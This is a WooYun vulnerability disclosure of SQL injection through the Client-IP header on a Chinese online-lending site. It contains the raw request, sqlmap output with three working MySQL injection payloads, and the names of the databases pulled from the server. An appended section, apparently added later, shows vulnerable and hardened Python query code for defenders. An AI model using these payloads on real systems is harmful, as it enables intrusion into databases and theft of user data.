
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143220

Title: Injection on the Wangdai (网贷网) main site

Vendor: Wangdai (网贷网)

Author: 路人甲

Submitted: 2015-09-24 16:32

Fix time: 2015-11-08 16:34

Published: 2015-11-08 16:34

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-24: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-11-08: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Wangdai.com (网贷网) is a virtual-asset lending service platform under GZ.COM. It aims to give online-asset investors and wealth-management clients a fast, convenient, secure and trustworthy platform, letting online-asset investors quickly monetise idle assets to meet funding needs while giving people with idle funds a better return, so that all sides benefit.
Following the rapid growth of the Internet, Wangdai.com draws on market demand and modern network technology to build China's first online lending platform that accepts online assets as collateral, opening a new phase for virtual-asset lending services.
About GZ.COM
Guangzhou Mingyang Information Technology Co., Ltd. (GZ.COM) was founded in 2005 with investment from several well-known venture-capital institutions, and today leads the industry in direct-traffic navigation solutions and online brand (domain name) solutions.

Detailed description:

I searched for ages without finding a single injection; disheartening.
Just as I was about to give up, I found that the HTTP request was injectable (Client-IP), heh. Hand it to sqlmap and wait, a long wait...

Proof of vulnerability:

GET /jiekuan/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 1.1.1.1*
Cookie: PHPSESSID=p2sro4gsrirbcv2dk334q2g966; lzstat_uv=1115180456633299858|3552958; lzstat_ss=739736894_1_1443104119_3552958
Host: www.wangdai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


do you want to try URI injections in the target URL itself? [Y/n/q]
[16:12:31] [INFO] resuming back-end DBMS 'mysql'
[16:12:31] [INFO] testing connection to the target URL
[16:12:31] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 1.1.1.1' RLIKE (SELECT (CASE WHEN (5694=5694) THEN 0x312e312e312e31 ELSE 0x28 END)) AND 'qYgP'='qYgP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 1.1.1.1' AND (SELECT 1054 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(1054=1054,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'meVD'='meVD

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1.1.1.1' AND (SELECT * FROM (SELECT(SLEEP(5)))mJIR) AND 'XzSs'='XzSs
---
[16:12:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL 5.0
[16:12:31] [INFO] fetching database names
[16:12:31] [WARNING] reflective value(s) found and filtering out
[16:12:32] [INFO] the SQL query used returns 2 entries
[16:12:32] [INFO] retrieved: information_schema
[16:12:32] [INFO] retrieved: wangdai
available databases [2]:
[*] information_schema
[*] wangdai


Image: 网贷表.jpg

Image: 网贷数据.jpg

Fix recommendation:

Asking for 20 rank!

Copyright notice: credit the source when reposting: 路人甲@乌云
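The report itself offers no remediation, and it shows no server code, so the following is an added example rather than anything from the report or from the vendor's code base. It illustrates the root cause the sqlmap output points at, a `Client-IP` request header that reaches a SQL statement unvalidated, and the two defences a practitioner would apply: treat the header as untrusted input and accept it only if it parses as a literal IP address, and bind it as a query parameter rather than concatenating it. The request text, table, column and function names are constructed for the example, and SQLite stands in for the MySQL back end named in the report; the `count_visits_vulnerable` function is an assumed reconstruction of the concatenation pattern, not the site's actual code.

```python
import ipaddress
import sqlite3

# Constructed sample request modelled on the one in the report (cookie and
# other headers trimmed, host replaced). The trailing quoted condition is the
# kind of probe sqlmap sends through the header.
RAW_REQUEST_PROBE = (
    "GET /jiekuan/ HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "Client-IP: 1.1.1.1' AND 'a'='a\r\n"
    "Accept: */*\r\n"
    "\r\n"
)
RAW_REQUEST_OK = RAW_REQUEST_PROBE.replace("1.1.1.1' AND 'a'='a", "1.1.1.1")


def parse_headers(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into a dict keyed by lower-cased header name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:        # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def client_ip(headers: dict):
    """Return the Client-IP value as a canonical IP string, or None if it is
    not a literal IPv4/IPv6 address. Quotes, SQL fragments and the '*'
    marker sqlmap uses all fail to parse and are rejected here, before any
    query is built. The header is client-controlled, so this is the only
    safe way to use it at all."""
    value = headers.get("client-ip")
    if value is None:
        return None
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's MySQL database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (id INTEGER PRIMARY KEY, ip TEXT NOT NULL)")
    conn.executemany("INSERT INTO visits (ip) VALUES (?)",
                     [("1.1.1.1",), ("10.0.0.5",), ("192.0.2.9",)])
    return conn


def count_visits_vulnerable(conn, headers: dict) -> int:
    """Assumed vulnerable pattern: the header value is spliced into the SQL
    text, so whatever follows a quote is executed as SQL."""
    value = headers.get("client-ip", "")
    sql = "SELECT COUNT(*) FROM visits WHERE ip = '" + value + "'"
    return conn.execute(sql).fetchone()[0]


def count_visits_hardened(conn, headers: dict):
    """Hardened form: validate the header as an IP, then bind it as a
    parameter. Returns None when the header is not a valid address; the
    caller should log that and answer 400 rather than query."""
    ip = client_ip(headers)
    if ip is None:
        return None
    row = conn.execute("SELECT COUNT(*) FROM visits WHERE ip = ?", (ip,)).fetchone()
    return row[0]


if __name__ == "__main__":
    db = setup_db()
    for label, raw in (("legitimate", RAW_REQUEST_OK), ("probe", RAW_REQUEST_PROBE)):
        hdrs = parse_headers(raw)
        print(label, "vulnerable:", count_visits_vulnerable(db, hdrs),
              "hardened:", count_visits_hardened(db, hdrs))
```

Note that the vulnerable function returns a normal-looking count for the probe request: the injected condition is simply evaluated as SQL, which is exactly what sqlmap's boolean-based and error-based tests rely on. The hardened path never reaches the database with that input, and the same `client_ip` check is a cheap detection hook: any request whose `Client-IP` fails to parse is worth logging as a probe.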


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused

Vulnerability Rank: 15 (WooYun rating)